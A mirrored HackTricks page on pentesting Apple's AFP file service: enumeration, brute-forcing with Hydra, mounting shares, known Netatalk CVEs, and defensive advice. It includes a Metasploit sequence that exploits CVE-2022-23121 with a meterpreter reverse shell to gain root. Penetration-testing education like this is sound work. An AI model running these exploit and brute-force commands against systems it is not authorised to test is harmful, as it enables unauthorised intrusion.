maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/network-services-pentesting/584-pentesting-afp.md

125 lines
4.7 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 548 - Pentesting Apple Filing Protocol (AFP)
{{#include ../banners/hacktricks-training.md}}
## Basic Information
The **Apple Filing Protocol** (**AFP**), once known as AppleTalk Filing Protocol, is a specialized network protocol included within **Apple File Service** (**AFS**). It is designed to provide file services for macOS and the classic Mac OS. AFP stands out for supporting Unicode file names, POSIX-style and ACL permissions, resource forks, named extended attributes and sophisticated file-locking mechanisms.
Although AFP has been superseded by SMB in modern macOS releases (SMB is the default since OS X 10.9), it is still encountered in:
* Legacy macOS / Mac OS 9 environments
* NAS appliances (QNAP, Synology, Western Digital, TrueNAS…) that embed the open-source **Netatalk** daemon
* Mixed-OS networks where Time-Machine-over-AFP is still enabled
**Default TCP Port:** **548** (AFP over TCP / DSI)
```bash
PORT STATE SERVICE
548/tcp open afp
```
---
## Enumeration
### Quick banner / server info
```bash
# Metasploit auxiliary
use auxiliary/scanner/afp/afp_server_info
run RHOSTS=<IP>
# Nmap NSE
nmap -p 548 -sV --script "afp-* and not dos" <IP>
```
Useful AFP NSE scripts:
| Script | What it does |
|--------|--------------|
| **afp-ls** | List available AFP volumes and files |
| **afp-brute** | Password brute-force against AFP login |
| **afp-serverinfo** | Dump server name, machine type, AFP version, supported UAMs, etc. |
| **afp-showmount** | List shares together with their ACLs |
| **afp-path-vuln** | Detects (and can exploit) directory-traversal, CVE-2010-0533 |
The NSE brute-force script can be combined with Hydra/Medusa if more control is required:
```bash
hydra -L users.txt -P passwords.txt afp://<IP>
```
### Interacting with shares
*macOS*
```bash
# Finder → Go → "Connect to Server…"
# or from terminal
mkdir /Volumes/afp
mount_afp afp://USER:[email protected]/SHARE /Volumes/afp
```
*Linux* (using `afpfs-ng` packaged in most distros)
```bash
apt install afpfs-ng
mkdir /mnt/afp
mount_afp afp://USER:[email protected]/SHARE /mnt/afp
# or interactive client
afp_client <IP>
```
Once mounted, remember that classic Mac resource-forks are stored as hidden `._*` AppleDouble files these often hold interesting metadata that DFIR tools miss.
---
## Common Vulnerabilities & Exploitation
### Netatalk unauthenticated RCE chain (2022)
Several NAS vendors shipped **Netatalk ≤3.1.12**. A lack of bounds checking in `parse_entries()` allows an attacker to craft a malicious **AppleDouble** header and obtain **remote root** before authentication (**CVSS 9.8 CVE-2022-23121**). A full write-up by NCC Group with PoC exploiting Western-Digital PR4100 is available.
Metasploit (>= 6.3) ships the module `exploit/linux/netatalk/parse_entries` which delivers the payload via DSI `WRITE`.
```bash
use exploit/linux/netatalk/parse_entries
set RHOSTS <IP>
set TARGET 0 # Automatic (Netatalk)
set PAYLOAD linux/x64/meterpreter_reverse_tcp
run
```
If the target runs an affected QNAP/Synology firmware, successful exploitation yields a shell as **root**.
### Netatalk OpenSession heap overflow (2018)
Older Netatalk (3.0.0 - 3.1.11) is vulnerable to an out-of-bounds write in the **DSI OpenSession** handler allowing unauthenticated code execution (**CVE-2018-1160**). A detailed analysis and PoC were published by Tenable Research.
### Other notable issues
* **CVE-2022-22995** Symlink redirection leading to arbitrary file write / RCE when AppleDouble v2 is enabled (3.1.0 - 3.1.17).
* **CVE-2010-0533** Directory traversal in Apple Mac OS X 10.6 AFP (detected by `afp-path-vuln.nse`).
* Multiple memory-safety bugs were fixed in **Netatalk 4.x (2024)** recommend upgrading rather than patching individual CVEs.
---
## Defensive Recommendations
1. **Disable AFP** unless strictly required use SMB3 or NFS instead.
2. If AFP must stay, **upgrade Netatalk to ≥ 3.1.18 or 4.x**, or apply vendor firmware that back-ports the 2022/2023/2024 patches.
3. Enforce **Strong UAMs** (e.g. *DHX2*), disable clear-text and guest logins.
4. Restrict TCP 548 to trusted subnets and wrap AFP inside a VPN when exposed remotely.
5. Periodically scan with `nmap -p 548 --script afp-*` in CI/CD to catch rogue / downgraded appliances.
---
### [Brute-Force](../generic-hacking/brute-force.md#afp)
## References
* Netatalk Security Advisory CVE-2022-23121 "Arbitrary code execution in parse_entries" <https://netatalk.io/security/CVE-2022-23121>
* Tenable Research "Exploiting an 18-Year-Old Bug (CVE-2018-1160)" <https://medium.com/tenable-techblog/exploiting-an-18-year-old-bug-b47afe54172>
{{#include ../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink